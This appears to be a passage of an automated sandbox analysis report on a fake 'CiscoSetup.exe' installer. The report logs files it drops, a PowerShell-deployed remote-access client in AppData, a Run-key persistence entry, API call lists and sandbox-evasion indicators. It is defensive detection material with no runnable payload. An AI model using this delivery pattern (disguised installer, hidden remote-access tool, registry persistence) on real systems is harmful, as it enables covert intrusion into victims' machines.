                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q7D23.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D0HIO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-SINFC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-1KC0P.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-5J2U6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OJMRD.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1N4FB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2J155.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-VTDA9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3NCDE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-8OL4N.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MMI8M.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-T9GPQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RDO3H.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-50H6H.tmpJump to dropped file
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-H5812.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2TJID.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OTMTE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q2D0Q.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UM1NO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VFI6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-V8S0O.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MGVA1.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-53P9C.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S9VDU.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MKOUV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S996S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D2T5K.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68907030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,6_2_68907030
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F50E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_688F50E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F5117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_688F5117
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F5490 GetPrivateProfileIntA,6_2_688F5490
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CiscoJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cisco\Cisco Secure Client for Windows.lnkJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,6_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110F600 IsIconic,GetTickCount,6_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,6_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,9_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,9_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1110F600 IsIconic,GetTickCount,9_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,9_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,9_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,9_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,9_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029230
                                  Source: C:\Users\user\Desktop\CiscoSetup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069C006_2_11069C00
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069C996_2_11069C99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F91F06_2_688F91F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68904F306_2_68904F30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,6_2_11127110
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7105
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2626
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Window / User API: threadDelayed 436
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Window / User API: threadDelayed 8000
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-0CFDM.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-96AL6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-I704D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-N98KR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KHO2L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-91CSN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-98QQL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EUMLH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8761D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-7ITNQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-O18K3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-970AL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-RN0PK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3JN2R.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T4BIJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-Q7F68.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KLEUG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\unins000.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)
